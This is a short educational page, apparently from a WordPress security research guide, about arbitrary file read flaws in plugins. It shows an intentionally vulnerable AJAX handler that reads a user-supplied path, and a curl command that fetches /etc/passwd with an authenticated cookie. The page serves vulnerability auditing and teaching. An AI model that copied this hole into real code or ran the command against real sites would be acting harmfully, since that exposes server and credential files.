Skip to content

Arbitrary File Read


This article covers cases of possible Arbitrary File Read on WordPress. This includes improper file fetch handling inside of the plugin/theme which can be used to read arbitrary local files inside of the server.

Useful Functions

Several functions could be useful to identify a possible Arbitrary File Read vulnerability:

Example Cases

Below is an example of vulnerable code:

add_action("wp_ajax_get_file", "ajax_get_file");
public function ajax_get_file(){
global $wp_filesystem;
// Make sure that the above variable is properly setup.
require_once ABSPATH . 'wp-admin/includes/file.php';
$url = $_GET["url"];
$data = $wp_filesystem->get_contents($url);
$data = json_encode( $data );
echo $data;

To exploit this, any authenticated user just needs to perform a POST request to the /wp-admin/admin-ajax.php endpoint specifying the needed parameter to trigger the WP_Filesystem_Direct::get_contents function.

Terminal window
curl '<WORDPRESS_BASE_URL/wp-admin/admin-ajax.php?action=get_file&url=/etc/passwd' -H 'Cookie: <AUTHENTICATED_USER_COOKIE>'

Below are some of the findings related to Arbitrary File Read: